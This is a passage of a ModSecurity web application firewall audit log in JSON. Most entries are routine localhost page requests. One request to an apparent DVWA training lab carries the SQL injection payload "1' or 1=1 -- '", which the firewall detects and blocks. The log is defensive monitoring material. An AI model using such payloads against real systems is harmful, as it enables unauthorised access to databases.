{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGocAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:59:06 GMT","If-None-Match":"\"ccc-54f6abd648acd-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRdOwn8AAQEAABwOGocAAAAB\"]"],"stopwatch":{"p1":2171,"p2":2603,"p3":103,"p4":5089,"p5":63,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGogAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:59:08 GMT","If-None-Match":"W/\"295-54f6abd8205b9\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:21:50 GMT","ETag":"\"295-54f6be54cc0d8\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdOwn8AAQEAABwOGogAAAAB\"]"],"stopwatch":{"p1":385,"p2":1140,"p3":63,"p4":202,"p5":57,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGokAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdOwn8AAQEAABwOGokAAAAB\"]"],"stopwatch":{"p1":519,"p2":867,"p3":45,"p4":322,"p5":90,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGooAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdOwn8AAQEAABwOGooAAAAB\"]"],"stopwatch":{"p1":491,"p2":1031,"p3":46,"p4":252,"p5":49,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrkAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:59:06 GMT","If-None-Match":"\"ccc-54f6abd648acd-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRdTOH8AAQEAABwPUrkAAAAC\"]"],"stopwatch":{"p1":874,"p2":1421,"p3":71,"p4":437,"p5":224,"sr":68,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUroAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 18:21:50 GMT","If-None-Match":"\"295-54f6be54cc0d8\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:40:54 GMT","ETag":"\"295-54f6c29741bca\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdTOH8AAQEAABwPUroAAAAC\"]"],"stopwatch":{"p1":479,"p2":957,"p3":68,"p4":173,"p5":77,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrsAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdTOH8AAQEAABwPUrsAAAAC\"]"],"stopwatch":{"p1":391,"p2":972,"p3":49,"p4":254,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrwAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdTOH8AAQEAABwPUrwAAAAC\"]"],"stopwatch":{"p1":427,"p2":1041,"p3":76,"p4":264,"p5":49,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:36 --0400","transaction_id":"WRdUUH8AAQEAABwQSCgAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
